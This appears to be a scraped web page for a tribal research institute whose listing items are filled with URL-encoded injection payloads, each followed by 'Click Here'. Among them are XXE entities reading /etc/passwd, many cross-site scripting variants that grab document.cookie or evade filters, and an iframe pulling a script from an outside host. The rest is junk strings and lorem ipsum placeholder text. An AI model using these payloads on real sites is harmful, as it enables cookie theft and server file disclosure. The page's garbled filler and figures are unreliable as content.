%3c%3fxml%20version%3d%221%2e0%22%20encoding%3d%22ISO-8859-1%22%3f%3e%3c!DOCTYPE%20foo%20[%3c!ELEMENT%20foo%20ANY%3e%3c!ENTITY%20xxe%20SYSTEM%20%22file%3a%2f%2f%2fetc%2fpasswd%22%3e]%3e%3cfoo%3e%26xee%3b%3c%2ffoo%3eClick Here

%3c%3fxml%20version%3d%221%2e0%22%20encoding%3d%22ISO-8859-1%22%3f%3e%3c!DOCTYPE%20foo%20[%3c!ELEMENT%20foo%20ANY%3e%3c!ENTITY%20xxe%20SYSTEM%20%22file%3a%2f%2f%2fdev%2frandom%22%3e]%3e%3cfoo%3e%26xee%3b%3c%2ffoo%3eClick Here

%3cscript%3ealert('XSS')%3c%2fscript%3eClick Here

%3cscript%3ealert('XSS')%3c%2fscript%3eClick Here

%22%3e%3cscript%3ealert('XSS')%3c%2fscript%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3e%20%20%20%20%20%20%20Click Here

%3cimg%20src%3dxss%20onerror%3dalert(1)%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(%26quot%3bXSS%26quot%3b)%3eClick Here

%3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%3eClick Here

%3cIMG%20SRC%3d%22jav%20ascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x09%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3eClick Here

%3cBODY%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cBODY%20ONLOAD%3dalert('XSS')%3eClick Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%22Click Here

%3ciframe%20src%3dhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%20%3cClick Here

%3c%3cSCRIPT%3ealert(%22XSS%22)%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%253cscript%253ealert(1)%253c%2fscript%253eClick Here

%22%3e%3cs%22%2b%22cript%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

foo%3cscript%3ealert(1)%3c%2fscript%3eClick Here

%3cscr%3cscript%3eipt%3ealert(1)%3c%2fscr%3c%2fscript%3eipt%3eClick Here

%3cSCRIPT%3eString%2efromCharCode(97,%20108,%20101,%20114,%20116,%2040,%2049,%2041)%3c%2fSCRIPT%3eClick Here

dddddddClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

fdfdffClick Here

sdsdsClick Here

<script>alert(document.cookie)</script>Click Here

Our Statistics

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec vulputate, eros sed mollis hendrerit, nisi metus fermentum quam, ac congue dui tellus ac purus. Curabitur cursus sagittis fermentum. Donec

  • 14
    Total District
  • 120
    Total Block
  • 68597
    Tribal Population

About Us

Hi Sir<script>hello</script><script>alert('XSS')</script>

Read More

Tribal Research Institute

<script>alert(document.cookie)</script>

Our Ministry

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla libero ante, sagittis sit amet nisl eu, pharetra scelerisque dui. Nulla egestas justo at est sollicitudin, vel laoreet felis pretium. Sed rhoncus, eros sit amet vestibulum ultrices,